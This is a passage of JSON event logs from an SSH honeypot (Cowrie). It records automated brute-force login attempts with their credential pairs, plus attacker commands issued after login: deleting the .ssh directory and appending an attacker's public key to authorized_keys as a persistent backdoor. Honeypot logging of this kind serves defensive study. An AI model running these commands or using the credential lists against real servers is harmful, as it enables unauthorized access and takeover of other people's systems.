AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T05:56:43.433079Z","src_ip":"212.227.235.229","session":"b3bacfc3d20e"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T05:56:43.692274Z","src_ip":"212.227.235.229","session":"b3bacfc3d20e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:56:43.693135Z","src_ip":"212.227.235.229","session":"b3bacfc3d20e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52212,"dst_ip":"1.2.3.4","dst_port":22,"session":"4caf217f2789","protocol":"ssh","message":"New connection: 212.227.235.229:52212 (1.2.3.4:22) [session: 4caf217f2789]","sensor":"my-vps","timestamp":"2025-08-31T05:56:43.946984Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:56:43.947853Z","src_ip":"212.227.235.229","session":"4caf217f2789"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:56:44.205471Z","src_ip":"212.227.235.229","session":"4caf217f2789"}
{"eventid":"cowrie.login.failed","username":"test3","password":"12345","message":"login attempt [test3/12345] failed","sensor":"my-vps","timestamp":"2025-08-31T05:56:44.820642Z","src_ip":"212.227.125.160","session":"5faceeef746c"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T05:56:45.275033Z","src_ip":"212.227.235.229","session":"4caf217f2789"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:56:46.533648Z","src_ip":"212.227.235.229","session":"4caf217f2789"}
{"eventid":"cowrie.session.closed","duration":"4.0","message":"Connection lost after 4.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:56:46.661601Z","src_ip":"212.227.125.160","session":"5faceeef746c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53192,"dst_ip":"1.2.3.4","dst_port":22,"session":"43f36976b5cc","protocol":"ssh","message":"New connection: 212.227.235.229:53192 (1.2.3.4:22) [session: 43f36976b5cc]","sensor":"my-vps","timestamp":"2025-08-31T05:56:46.789081Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:56:46.791898Z","src_ip":"212.227.235.229","session":"43f36976b5cc"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:56:47.047055Z","src_ip":"212.227.235.229","session":"43f36976b5cc"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:56:48.074952Z","src_ip":"212.227.235.229","session":"43f36976b5cc"}
{"eventid":"cowrie.session.closed","duration":"7.9","message":"Connection lost after 7.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:56:48.333074Z","src_ip":"212.227.235.229","session":"b3bacfc3d20e"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:56:48.334198Z","src_ip":"212.227.235.229","session":"43f36976b5cc"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:56:51.507254Z","src_ip":"212.227.235.229","session":"4c0837bc359e"}
{"eventid":"cowrie.session.connect","src_ip":"43.159.36.188","src_port":52752,"dst_ip":"1.2.3.4","dst_port":22,"session":"7a92a1025f58","protocol":"ssh","message":"New connection: 43.159.36.188:52752 (1.2.3.4:22) [session: 7a92a1025f58]","sensor":"my-vps","timestamp":"2025-08-31T05:56:51.812910Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:56:51.813754Z","src_ip":"43.159.36.188","session":"7a92a1025f58"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:56:52.058444Z","src_ip":"43.159.36.188","session":"7a92a1025f58"}
{"eventid":"cowrie.login.success","username":"root","password":"Azerty123@","message":"login attempt [root/Azerty123@] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:56:53.077053Z","src_ip":"43.159.36.188","session":"7a92a1025f58"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:56:53.585349Z","src_ip":"43.159.36.188","session":"7a92a1025f58"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T05:56:53.586168Z","src_ip":"43.159.36.188","session":"7a92a1025f58"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T05:56:53.587313Z","src_ip":"43.159.36.188","session":"7a92a1025f58"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:56:53.833354Z","src_ip":"43.159.36.188","session":"7a92a1025f58"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:56:54.380956Z","src_ip":"43.159.36.188","session":"7a92a1025f58"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T05:56:54.381734Z","src_ip":"43.159.36.188","session":"7a92a1025f58"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T05:56:54.628784Z","src_ip":"43.159.36.188","session":"7a92a1025f58"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:56:54.629684Z","src_ip":"43.159.36.188","session":"7a92a1025f58"}
{"eventid":"cowrie.session.connect","src_ip":"43.159.36.188","src_port":42390,"dst_ip":"1.2.3.4","dst_port":22,"session":"c7426d60e51c","protocol":"ssh","message":"New connection: 43.159.36.188:42390 (1.2.3.4:22) [session: c7426d60e51c]","sensor":"my-vps","timestamp":"2025-08-31T05:56:54.877812Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:56:54.878799Z","src_ip":"43.159.36.188","session":"c7426d60e51c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:56:55.128926Z","src_ip":"43.159.36.188","session":"c7426d60e51c"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T05:56:56.172987Z","src_ip":"43.159.36.188","session":"c7426d60e51c"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:56:57.425385Z","src_ip":"43.159.36.188","session":"c7426d60e51c"}
{"eventid":"cowrie.session.connect","src_ip":"43.159.36.188","src_port":42398,"dst_ip":"1.2.3.4","dst_port":22,"session":"9a648d8e873c","protocol":"ssh","message":"New connection: 43.159.36.188:42398 (1.2.3.4:22) [session: 9a648d8e873c]","sensor":"my-vps","timestamp":"2025-08-31T05:56:57.687504Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:56:57.688231Z","src_ip":"43.159.36.188","session":"9a648d8e873c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:56:57.951942Z","src_ip":"43.159.36.188","session":"9a648d8e873c"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:56:59.046641Z","src_ip":"43.159.36.188","session":"9a648d8e873c"}
{"eventid":"cowrie.session.closed","duration":"7.5","message":"Connection lost after 7.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:56:59.311270Z","src_ip":"43.159.36.188","session":"7a92a1025f58"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:56:59.312070Z","src_ip":"43.159.36.188","session":"9a648d8e873c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33016,"dst_ip":"1.2.3.4","dst_port":22,"session":"6bcb4f6be927","protocol":"ssh","message":"New connection: 212.227.125.160:33016 (1.2.3.4:22) [session: 6bcb4f6be927]","sensor":"my-vps","timestamp":"2025-08-31T05:56:59.938206Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47430,"dst_ip":"1.2.3.4","dst_port":22,"session":"5e8fac8f52e1","protocol":"ssh","message":"New connection: 212.227.235.229:47430 (1.2.3.4:22) [session: 5e8fac8f52e1]","sensor":"my-vps","timestamp":"2025-08-31T05:57:01.573211Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:57:01.573933Z","src_ip":"212.227.235.229","session":"5e8fac8f52e1"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:57:01.862931Z","src_ip":"212.227.235.229","session":"5e8fac8f52e1"}
{"eventid":"cowrie.login.failed","username":"admin","password":"password","message":"login attempt [admin/password] failed","sensor":"my-vps","timestamp":"2025-08-31T05:57:02.694125Z","src_ip":"212.227.235.229","session":"c3d29d7147e6"}
{"eventid":"cowrie.login.failed","username":"mahendra","password":"mahendra","message":"login attempt [mahendra/mahendra] failed","sensor":"my-vps","timestamp":"2025-08-31T05:57:03.061003Z","src_ip":"212.227.235.229","session":"5e8fac8f52e1"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:57:04.351393Z","src_ip":"212.227.235.229","session":"5e8fac8f52e1"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":63524,"dst_ip":"1.2.3.4","dst_port":22,"session":"76b34347b83d","protocol":"ssh","message":"New connection: 217.72.205.35:63524 (1.2.3.4:22) [session: 76b34347b83d]","sensor":"my-vps","timestamp":"2025-08-31T05:57:06.472594Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:57:06.474942Z","src_ip":"217.72.205.35","session":"76b34347b83d"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:57:08.511594Z","src_ip":"212.227.125.160","session":"6bcb4f6be927"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T05:57:08.513904Z","src_ip":"212.227.125.160","session":"6bcb4f6be927"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50192,"dst_ip":"1.2.3.4","dst_port":22,"session":"c4253c405e73","protocol":"ssh","message":"New connection: 212.227.235.229:50192 (1.2.3.4:22) [session: c4253c405e73]","sensor":"my-vps","timestamp":"2025-08-31T05:57:12.604250Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:57:12.604936Z","src_ip":"212.227.235.229","session":"c4253c405e73"}
{"eventid":"cowrie.session.closed","duration":"62.3","message":"Connection lost after 62.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:57:12.829232Z","src_ip":"212.227.235.229","session":"c3d29d7147e6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256